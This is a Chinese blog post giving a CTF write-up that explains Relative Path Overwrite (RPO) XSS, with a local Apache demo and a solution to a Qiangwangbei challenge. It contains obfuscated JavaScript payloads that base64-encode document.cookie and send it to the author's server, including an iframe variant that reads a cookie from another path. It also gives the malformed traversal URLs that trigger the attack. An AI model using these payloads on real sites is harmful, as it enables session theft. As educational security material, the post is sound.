<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="T3stzer0">


    <meta name="subtitle" content="思考">




<title>RPO攻击解析 | T3stzer0&#39;s Blog</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    



  <!-- for theme: default is false -->
  <!-- for page: default is true -->

<link rel="stylesheet" href="/js/fancybox/jquery.fancybox.min.css">



<meta name="generator" content="Hexo 5.2.0"></head>
<body>
	
		<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
       <script type="text/javascript" src="/js/fancybox/jquery.fancybox.min.js"></script>
       <script type="text/javascript" src="/js/wrapImage.js"></script>
   
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Home</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Home</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>

<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.5.1/build/styles/default.min.css">
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>

        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
			expand_toc()
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">RPO攻击解析</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">T3stzer0</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">三月 27, 2018</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/category/CTF/">CTF</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/userid363214time20141028063048at22.jpg"></p>
<blockquote>
<p>一种新的XSS攻击手法 以强网杯中的一道Web题为例做解析</p>
</blockquote>
<a id="more"></a>
<h1 id="前言">前言</h1>
<p>RPO(Relative Path
Overwrite)攻击，原理一句话概括就是利用服务器和客户端浏览器对当前网址不同的解析导致的。
# 本地演示 我们搭建本地环境来演示一下这个攻击，来一个比较直观的感官认识
首先我们的目录结构是这样的 pro │ 1.php │ common.js ├─ bbb │ common.js
在/pro目录下的common.js中是弹一个<code>common function</code>的窗</p>
<p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/10-11-22.jpg">
而/pro/bbb目录下的common.js中是弹一个<code>Evil function</code>的窗，代表这是一个我们可控的界面，然后写了个恶意的js脚本
<img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/10-11-58.jpg">
然后我们在1.php中引用了../../common.js</p>
<p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/10-18-51.jpg">
需要注意的是，我们在.htaccess中rewrite了1.php地址 当我们访问</p>
<pre class="url"><code>http://localhost/pro/1.php/test/1234</code></pre>
<p>就相当于访问</p>
<pre class="url"><code>http://localhost/pro/1.php?user=test&amp;id=1234</code></pre>
<p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/10-19-11.jpg">
这个在.htaccess里面很好实现，就是简化了传参方式，作用就是直观和简洁
访问在这个网址就会调用<code>../../common.js</code> 即</p>
<pre class="url"><code>http://localhost/pro/1.php/test/1234/../../common.js =&gt; http://localhost/pro/tecommon.js</code></pre>
<p>弹出了<code>common function</code>框 <img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/10-21-00.jpg"></p>
<p>一切看起来很正常，但是当我们输入这样的地址时</p>
<pre class="url"><code>http://localhost/pro/1.php/test%2f1234</code></pre>
<p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/10-23-00.jpg">
php解释器依旧正常解析，然而客户端的浏览器就出现问题了，它现在调用<code>../../common.js</code>却是在请求<code>http://localhost/common.js</code>
<img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/10-25-20.jpg">
很容易我们可以意识到一个问题，服务器和浏览器对网址的解析出现了差异
服务器对地址</p>
<pre class="url"><code>http://localhost/pro/1.php/test%2f1234</code></pre>
<p>能解码成</p>
<pre class="url"><code>http://localhost/pro/1.php/test/1234</code></pre>
<p>然后正常访问，但是在客户端的浏览器却无法识别<code>%2f</code>而是把<code>test%2f1234</code>当成了一个层次目录里面的文件而不是<code>test/1234</code>这样的跨层次目录结构
所以浏览器会将
<code>http://localhost/</code><del>pro/1.php/test%2f1234/../..</del><code>/common.js</code>
解释成<code>http://localhost/common.js</code>
总的来说，浏览器并不能识别<code>%2f</code>，并不把它当成分割目录的符号而是把它当成一个普通的没有任何特殊意义的字符，但是服务器却能识别
所以我们尝试输入这样的地址</p>
<pre class="url"><code>http://localhost/pro/bbb/..%2f1.php/test/123</code></pre>
<p>即<code>http://localhost/pro/</code><del>bbb/..%2f</del><code>1.php/test/123</code>
=&gt; <code>http://localhost/pro/1.php/test/123</code></p>
<p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/10-33-02.jpg">
服务器正常访问而对于浏览器来说，引用<code>../../common.js</code>却是这样的
<code>http://localhost/pro/bbb/</code><del>..%2f1.php/test/123/../../</del><code>common.js</code>
然后就访问了<code>http://localhost/pro/bbb/common.js</code>，然后执行了里面的JS代码</p>
<p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/10-37-01.jpg">
对于.CSS等静态文件也是一样的原理(css里面用expression也可以执行一些敏感操作)
对此我们可以执行任意可控的静态页面(反过来我们也可以将动态页面当静态页面获取源码)
## Apache配置 1.打开Apache 的 mod_rewrite模块</p>
<p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/10-42-54.jpg"></p>
<p>在httpd.conf中去掉注释LoadModule rewrite_module
modules/mod_rewrite.so的<code>#</code>即可
2.在httpd.conf中网站目录下的<Directory>把AllowOverride
none改为AllowOverride All <img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/10-45-24.jpg">
3.在httpd.conf末尾加上AllowEncodedSlashes
On这句，表示允许在地址中<code>%2f</code> <code>/</code>
<code>\</code>等斜杠 4.在网站根目录下创建.htaccess文件,内容如下:</Directory></p>
<div class="sourceCode" id="cb8"><pre class="sourceCode xml"><code class="sourceCode xml"><span id="cb8-1"><a href="#cb8-1" aria-hidden="true" tabindex="-1"></a>&lt;<span class="kw">ifmodule</span><span class="ot"> mod_rewrite.c</span><span class="er">&gt;</span></span>
<span id="cb8-2"><a href="#cb8-2" aria-hidden="true" tabindex="-1"></a><span class="er">RewriteEngine</span>  <span class="er">On</span>   <span class="er">/*开启重写引擎*/</span></span>
<span id="cb8-3"><a href="#cb8-3" aria-hidden="true" tabindex="-1"></a><span class="er">RewriteCond</span>  <span class="er">匹配条件</span></span>
<span id="cb8-4"><a href="#cb8-4" aria-hidden="true" tabindex="-1"></a><span class="er">RewriteRule</span> <span class="er">匹配规则</span></span>
<span id="cb8-5"><a href="#cb8-5" aria-hidden="true" tabindex="-1"></a><span class="er">&lt;/ifmodule&gt;</span></span></code></pre></div>
<h1 id="以ctf题为例">以CTF题为例</h1>
<p>我们现在以强网杯中的一道XSS题为例，演示RPO攻击
首先进去是一个登陆的界面 <img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/00-19-02.jpg"></p>
<p>随便注册个账号进去，发现了一个留言板和一个提交网址的界面</p>
<p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/00-20-10.jpg"> <img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/00-20-16.jpg"> 玩过XSS的同学都知道这个验证码预示着啥
于是我将大量时间研究这里，直到出现了第二个Hint <img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/10-51-12.jpg"></p>
<p>确实有点气 分析一下
<code>index.php</code>部分明显用了重写如地址<code>http://39.107.33.96:20000/index.php/view/article/1729</code>应该等于<code>http://39.107.33.96:20000/index.php?mod=view&amp;type=article&amp;id=1729</code>
+ 在write
article的地方应该使用了<code>htmlspecialchars()</code>函数转义了<code>&lt;&gt;</code>、<code>'</code>、<code>"</code>等符号
+ 在report界面我们可以提交本地的url给管理员点击访问 +
index.php用相对路径引用了
<code>static/js/jquery.min.js</code>和<code>static/js/index.js</code>
我们尝试一下随便写个<code>12345</code>进article
然后访问地址<code>http://39.107.33.96:20000/index.php/view/article/1729</code></p>
<p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/11-15-07.jpg">
当我们在这个地址后面随便加点东西时：</p>
<pre class="url"><code>http://39.107.33.96:20000/index.php/view/article/1729/12rfv1g/sfw2ghvneov/cfv32jvnniob</code></pre>
<p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/11-17-41.jpg"> 仍然解析正确
我们可以理解为后面乱输入的几个参数并没有对应代码处理，也就被忽略了，前面几个参数则正确处理，显示了正确的文章
如访问一个网站<code>http://www.wzsite.cn?name=test&amp;age=666</code>，然而站点里面并没有<code>name</code>和<code>age</code>对应参数处理，但是服务依旧会正常执行
是不是很熟悉？ 对的，就是RPO攻击 我们基本确定思路为： 1.
在article里面构造js代码，单、双引号可以用函数String.fromCharCode()以及反引号加上<code>\u0022</code>等unicode绕过
2.
然后利用RPO攻击计较畸形的url给他点击，然后将article里面的静态文本当成js代码执行</p>
<p>我们首先构造这样的一个payload，绕过对尖括号和单双引号的转义：</p>
<div class="sourceCode" id="cb10"><pre class="sourceCode javascript"><code class="sourceCode javascript"><span id="cb10-1"><a href="#cb10-1" aria-hidden="true" tabindex="-1"></a>(<span class="kw">new</span> <span class="fu">Image</span>())<span class="op">.</span><span class="at">src</span> <span class="op">=</span> <span class="bu">String</span><span class="op">.</span><span class="fu">fromCharCode</span>(<span class="dv">104</span><span class="op">,</span> <span class="dv">116</span><span class="op">,</span> <span class="dv">116</span><span class="op">,</span> <span class="dv">112</span><span class="op">,</span> <span class="dv">58</span><span class="op">,</span> <span class="dv">47</span><span class="op">,</span> <span class="dv">47</span><span class="op">,</span> <span class="dv">119</span><span class="op">,</span> <span class="dv">119</span><span class="op">,</span> <span class="dv">119</span><span class="op">,</span> <span class="dv">46</span><span class="op">,</span> <span class="dv">119</span><span class="op">,</span> <span class="dv">122</span><span class="op">,</span> <span class="dv">115</span><span class="op">,</span> <span class="dv">105</span><span class="op">,</span> <span class="dv">116</span><span class="op">,</span> <span class="dv">101</span><span class="op">,</span> <span class="dv">46</span><span class="op">,</span> <span class="dv">99</span><span class="op">,</span> <span class="dv">110</span><span class="op">,</span> <span class="dv">58</span><span class="op">,</span> <span class="dv">50</span><span class="op">,</span> <span class="dv">53</span><span class="op">,</span> <span class="dv">48</span><span class="op">,</span> <span class="dv">49</span><span class="op">,</span> <span class="dv">63</span><span class="op">,</span> <span class="dv">99</span><span class="op">,</span> <span class="dv">111</span><span class="op">,</span> <span class="dv">111</span><span class="op">,</span> <span class="dv">61</span>)<span class="op">+</span><span class="fu">btoa</span>(<span class="bu">document</span><span class="op">.</span><span class="at">cookie</span>)<span class="op">;</span></span></code></pre></div>
<p>大意就是new一个image，然后设置src=<code>http://my_VPS:port?coo=</code>+bbtoa(document.cookie),btoa()是base64编码</p>
<p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/11-04-37.jpg">
将在article里面写入payload，得到如下
<code>http://39.107.33.96:20000/index.php/view/article/1546</code> <img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/11-22-53.jpg">
然后我们在VPS打开2501端口侦听(当然你也可以放到xss平台)
随后我们测试一下，访问地址</p>
<pre class="url"><code>http://39.107.33.96:20000/index.php/view/article/1546/..%2f..%2f..%2f..%2findex.php</code></pre>
<p>发现我们的vps的2501端口接受到了请求：</p>
<p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/11-25-55.jpg">
这是因为当我们访问地址<code>http://39.107.33.96:20000/index.php/view/article/1546/..%2f..%2f..%2f..%2findex.php</code>
对于服务器来说我们访问的是
<code>http://39.107.33.96:20000/</code><del>index.php/view/article/1546/..%2f..%2f..%2f..%2f</del><code>index.php</code>
然后我们客户端的浏览器却认为<del>/..%2f..%2f..%2f..%2f</del>是同一层目录的，所以在调用<code>/static/js/jquery.min.js</code>的时候其实会去请求地址</p>
<pre class="url"><code>http://39.107.33.96:20000/index.php/view/article/1546/static/js/jquery.min.js</code></pre>
<p>而对于重写的url来说只是传多了<code>static</code>、<code>js</code>、<code>jquery.min.js</code>几个参数，依然返回的是这个地址的内容</p>
<pre class="url"><code>http://39.107.33.96:20000/index.php/view/article/1546</code></pre>
<p>然后浏览器会将返回的内容当JS代码进行解析执行，向我的服务器2501端口发送带cookie的请求
所以现在我们将这个畸形的地址发给admin访问就能获取到cookie了
此外那个验证码自己用python写个脚本碰撞一下就好了，我的做法是事先生成一个一一对应的类似于字典的东西，然后每次只需要读文件而不需要重新计算，会快很多，拿空间换时间嘛
提交之后我们的vps就会收到请求了</p>
<p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/14-53-25.jpg"></p>
<p>所以我们base64解码一下传回来的<code>coo</code></p>
<p><img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/14-56-27.jpg"></p>
<p>就会发现一个<code>hint</code>，叫我们去读取<code>/QWB_fl4g/QWB/</code>下的cookie
那么我们需要用iframe进行同域cookie读取，payload如下：</p>
<div class="sourceCode" id="cb14"><pre class="sourceCode javascript"><code class="sourceCode javascript"><span id="cb14-1"><a href="#cb14-1" aria-hidden="true" tabindex="-1"></a><span class="kw">var</span> iframe <span class="op">=</span> <span class="bu">document</span><span class="op">.</span><span class="fu">createElement</span>(<span class="bu">String</span><span class="op">.</span><span class="fu">fromCharCode</span>(<span class="dv">105</span><span class="op">,</span> <span class="dv">102</span><span class="op">,</span> <span class="dv">114</span><span class="op">,</span> <span class="dv">97</span><span class="op">,</span> <span class="dv">109</span><span class="op">,</span> <span class="dv">101</span>))<span class="op">;</span><span class="co">//create一个iframe</span></span>
<span id="cb14-2"><a href="#cb14-2" aria-hidden="true" tabindex="-1"></a>iframe<span class="op">.</span><span class="at">name</span><span class="op">=</span><span class="bu">String</span><span class="op">.</span><span class="fu">fromCharCode</span>(<span class="dv">84</span><span class="op">,</span> <span class="dv">101</span><span class="op">,</span> <span class="dv">115</span><span class="op">,</span> <span class="dv">116</span><span class="op">,</span> <span class="dv">122</span><span class="op">,</span> <span class="dv">101</span><span class="op">,</span> <span class="dv">114</span><span class="op">,</span> <span class="dv">111</span>)<span class="op">;</span><span class="co">//命名为Testzero</span></span>
<span id="cb14-3"><a href="#cb14-3" aria-hidden="true" tabindex="-1"></a>iframe<span class="op">.</span><span class="at">src</span><span class="op">=</span><span class="bu">String</span><span class="op">.</span><span class="fu">fromCharCode</span>(<span class="dv">104</span><span class="op">,</span> <span class="dv">116</span><span class="op">,</span> <span class="dv">116</span><span class="op">,</span> <span class="dv">112</span><span class="op">,</span> <span class="dv">58</span><span class="op">,</span> <span class="dv">47</span><span class="op">,</span> <span class="dv">47</span><span class="op">,</span> <span class="dv">51</span><span class="op">,</span> <span class="dv">57</span><span class="op">,</span> <span class="dv">46</span><span class="op">,</span> <span class="dv">49</span><span class="op">,</span> <span class="dv">48</span><span class="op">,</span> <span class="dv">55</span><span class="op">,</span> <span class="dv">46</span><span class="op">,</span> <span class="dv">51</span><span class="op">,</span> <span class="dv">51</span><span class="op">,</span> <span class="dv">46</span><span class="op">,</span> <span class="dv">57</span><span class="op">,</span> <span class="dv">54</span><span class="op">,</span> <span class="dv">58</span><span class="op">,</span> <span class="dv">50</span><span class="op">,</span> <span class="dv">48</span><span class="op">,</span> <span class="dv">48</span><span class="op">,</span> <span class="dv">48</span><span class="op">,</span> <span class="dv">48</span><span class="op">,</span> <span class="dv">47</span><span class="op">,</span> <span class="dv">81</span><span class="op">,</span> <span class="dv">87</span><span class="op">,</span> <span class="dv">66</span><span class="op">,</span> <span class="dv">95</span><span class="op">,</span> <span class="dv">102</span><span class="op">,</span> <span class="dv">108</span><span class="op">,</span> <span class="dv">52</span><span class="op">,</span> <span class="dv">103</span><span class="op">,</span> <span class="dv">47</span><span class="op">,</span> <span class="dv">81</span><span class="op">,</span> <span class="dv">87</span><span class="op">,</span> <span class="dv">66</span><span class="op">,</span> <span class="dv">47</span>)<span class="op">;</span><span class="co">//设置iframe的src为http://39.107.33.96:20000/QWB_fl4g/QWB/</span></span>
<span id="cb14-4"><a href="#cb14-4" aria-hidden="true" tabindex="-1"></a><span class="bu">document</span><span class="op">.</span><span class="at">body</span><span class="op">.</span><span class="fu">appendChild</span>(iframe)<span class="op">;</span><span class="co">//append iframe</span></span>
<span id="cb14-5"><a href="#cb14-5" aria-hidden="true" tabindex="-1"></a><span class="co">//当iframe加载好之后将执行一个函数，函数的作用是将当前网址转向http://my_vps:2501?coo=iframe的cookie</span></span>
<span id="cb14-6"><a href="#cb14-6" aria-hidden="true" tabindex="-1"></a>iframe<span class="op">.</span><span class="at">onload</span> <span class="op">=</span> <span class="kw">function</span>()&#123;location<span class="op">.</span><span class="at">href</span><span class="op">=</span><span class="bu">String</span><span class="op">.</span><span class="fu">fromCharCode</span>(<span class="dv">104</span><span class="op">,</span> <span class="dv">116</span><span class="op">,</span> <span class="dv">116</span><span class="op">,</span> <span class="dv">112</span><span class="op">,</span> <span class="dv">58</span><span class="op">,</span> <span class="dv">47</span><span class="op">,</span> <span class="dv">47</span><span class="op">,</span> <span class="dv">119</span><span class="op">,</span> <span class="dv">119</span><span class="op">,</span> <span class="dv">119</span><span class="op">,</span> <span class="dv">46</span><span class="op">,</span> <span class="dv">119</span><span class="op">,</span> <span class="dv">122</span><span class="op">,</span> <span class="dv">115</span><span class="op">,</span> <span class="dv">105</span><span class="op">,</span> <span class="dv">116</span><span class="op">,</span> <span class="dv">101</span><span class="op">,</span> <span class="dv">46</span><span class="op">,</span> <span class="dv">99</span><span class="op">,</span> <span class="dv">110</span><span class="op">,</span> <span class="dv">58</span><span class="op">,</span> <span class="dv">50</span><span class="op">,</span> <span class="dv">53</span><span class="op">,</span> <span class="dv">48</span><span class="op">,</span> <span class="dv">49</span><span class="op">,</span> <span class="dv">63</span><span class="op">,</span> <span class="dv">99</span><span class="op">,</span> <span class="dv">111</span><span class="op">,</span> <span class="dv">111</span><span class="op">,</span> <span class="dv">107</span><span class="op">,</span> <span class="dv">105</span><span class="op">,</span> <span class="dv">101</span><span class="op">,</span> <span class="dv">61</span>)<span class="op">+</span><span class="fu">btoa</span>(Testzero<span class="op">.</span><span class="at">window</span><span class="op">.</span><span class="at">document</span><span class="op">.</span><span class="at">cookie</span>)<span class="op">;</span>&#125;</span></code></pre></div>
<p>然后一样写进article，然后再将对应的畸形url
report给admin，就可以收到flag了
唯一需要注意的是写js的payload的时候需要等iframe加载完毕之后再跳转，不然带不出flag
<img src="/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/15-04-26.jpg"></p>
<div class="sourceCode" id="cb15"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb15-1"><a href="#cb15-1" aria-hidden="true" tabindex="-1"></a><span class="bu">echo</span> ZmxhZz1RV0IlN0JmbGFnX2lzX2Y0M2t0aDRycG8lN0Q7IJTlQ9VHJ5IHRvIGdldCB0aGUgY29va2llIG9mIHBhdGggIi9RV0JfZmw0Zy9RV0IvIg== <span class="kw">|</span> <span class="fu">base64</span> <span class="at">-d</span></span>
<span id="cb15-2"><a href="#cb15-2" aria-hidden="true" tabindex="-1"></a><span class="va">flag</span><span class="op">=</span>QWB%7Bflag_is_f43kth4rpo%7D<span class="kw">;</span> <span class="va">HINT</span><span class="op">=</span>Try <span class="ex">to</span> get the cookie of path <span class="st">&quot;/QWB_fl4g/QWB/&quot;</span></span></code></pre></div>
<p>获得flag <code>QWB&#123;flag_is_f43kth4rpo&#125;</code> ### RPO 解决方案 +
不用相对路径，用绝对路径 +
不允许%2f等存在在url里面，如关闭AllowEncodedSlashes（Ngnix也存在该问题）</p>
<h3 id="最后说一句">最后说一句</h3>
<p>这位文章的师傅说的很对<a target="_blank" rel="noopener" href="http://www.qingpingshan.com/pc/aq/240597.html">Pwnhub大物必须过Writeup</a>
一遍打比赛一遍学姿势，给做题人方向上的引导，引发思考，这才是一道<strong>好题</strong>所需要做的
想想之前一些盗题的、脑洞的、考毫无意义的知识的比赛，这个题真的让人如浴春风</p>
<p><strong>感谢阅读</strong></p>
<h3 id="参考链接">参考链接：</h3>
<p><a target="_blank" rel="noopener" href="http://blog.nsfocus.net/rpo-attack/">RPO攻击技术浅析 -
http://blog.nsfocus.net/rpo-attack/</a> <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2220">深入剖析RPO漏洞 -
https://xz.aliyun.com/t/2220</a> <a target="_blank" rel="noopener" href="http://www.qingpingshan.com/pc/aq/240597.html">Pwnhub大物必须过Writeup
- http://www.qingpingshan.com/pc/aq/240597.html</a> <a target="_blank" rel="noopener" href="http://www.ideawu.net/blog/archives/494.html">链接包含”%2F”导致mod_rewrite失效
- http://www.ideawu.net/blog/archives/494.html</a> <a target="_blank" rel="noopener" href="http://www.ideawu.net/blog/archives/618.html">Apache用mod_rewrite配置子域名
- http://www.ideawu.net/blog/archives/618.html</a></p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>T3stzer0</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://www.testzero-wz.com/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/">https://www.testzero-wz.com/2018/03/27/RPO%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tag/CTF/"># CTF</a>
                    
                        <a href="/tag/%E6%80%BB%E7%BB%93/"># 总结</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2018/04/06/%E5%86%99%E4%B8%80%E4%B8%AAARP%E6%AC%BA%E9%AA%97%E7%9A%84%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%B7%A5%E5%85%B7/">写一个ARP欺骗的命令行工具</a>
            
            
            <a class="next" rel="next" href="/2018/03/26/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E5%BC%BA%E7%BD%91%E6%9D%AF-QWB-%E9%83%A8%E5%88%86Writeup/">第二届强网杯-QWB-部分Writeup</a>
            
        </section>


    </article>
</div>

        </div>
        <!-- 
<footer id="footer" class="footer">
    <div class="copyright">
        <span>© T3stzer0 | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

-->
<script src="/js/highlight.min.js"></script>
<script>hljs.highlightAll();</script>

    </div>
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<!-- <script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-MML-AM_CHTML"></script> -->

<script src="https://cdnjs.loli.net/ajax/libs/mathjax/2.7.7/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
</body>
</html>
